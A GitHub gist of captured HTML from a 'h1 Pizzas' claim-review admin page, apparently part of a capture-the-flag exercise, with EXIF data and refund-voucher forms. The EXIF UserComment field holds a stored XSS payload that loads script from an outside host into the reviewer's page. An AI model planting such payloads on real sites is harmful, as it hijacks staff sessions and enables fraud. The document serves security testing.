Skip to content

Instantly share code, notes, and snippets.

@ziot
Created July 31, 2020 18:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ziot/0863e513844e926decb86965bca557e6 to your computer and use it in GitHub Desktop.
Save ziot/0863e513844e926decb86965bca557e6 to your computer and use it in GitHub Desktop.
<html lang="en"><head>
<title>h1 Pizzas - Claim Review</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
</head>
<body>
<div class="container" style="margin-top:90px;margin-bottom: 40px">
<div class="row">
<div class="col-md-6 col-md-offset-3">
<div class="panel panel-default">
<div class="panel-heading">Claim Review</div>
<div class="panel-body" style="padding-top:0px">
<h2 class="text-center">Image Exif Data</h2>
<table class="table">
<tbody><tr>
<td>FileName</td>
<td>php4BrA5Y</td>
</tr>
<tr>
<td>FileDateTime</td>
<td></td>
</tr>
<tr>
<td>FileSize</td>
<td></td>
</tr>
<tr>
<td>FileType</td>
<td></td>
</tr>
<tr>
<td>MimeType</td>
<td>image/jpeg</td>
</tr>
<tr>
<td>SectionsFound</td>
<td>ANY_TAG, IFD0, THUMBNAIL, EXIF, WINXP</td>
</tr>
<tr>
<td>COMPUTED</td>
<td></td>
</tr>
<tr>
<td>Exif_IFD_Pointer</td>
<td></td>
</tr>
<tr>
<td>Comments</td>
<td>?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????</td>
</tr>
<tr>
<td>UndefinedTag:0xEA1C</td>
<td>ê</td>
</tr>
<tr>
<td>THUMBNAIL</td>
<td></td>
</tr>
<tr>
<td>UserComment</td>
<td>ASCII';";"&gt;<script src="https://xss.buer.haus/2.js"></script></td>
</tr>
</tbody></table>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading">Voucher Code</div>
<div class="panel-body">
<form method="post">
<div class="alert alert-info text-center">
<p>Create a voucher code for a customer refund</p>
<p>Enter the amount in pence/cents i.e $10.00 = 1000</p>
</div>
<div><label>Amount</label></div>
<div><input name="voucher_amount" class="form-control"></div>
<div style="margin-top:10px"><input type="submit" class="btn btn-success pull-right" value="Create Voucher"></div>
</form>
</div>
</div>
<div class="panel panel-danger">
<div class="panel-heading">Decline Claim</div>
<div class="panel-body">
<form method="post">
<input type="hidden" name="decline" value="1">
<div class="alert alert-danger text-center">
<p>Decline the claim</p>
</div>
<div style="margin-top:10px"><input type="submit" class="btn btn-danger pull-right" value="Decline Claim"></div>
</form>
</div>
</div>
</div>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment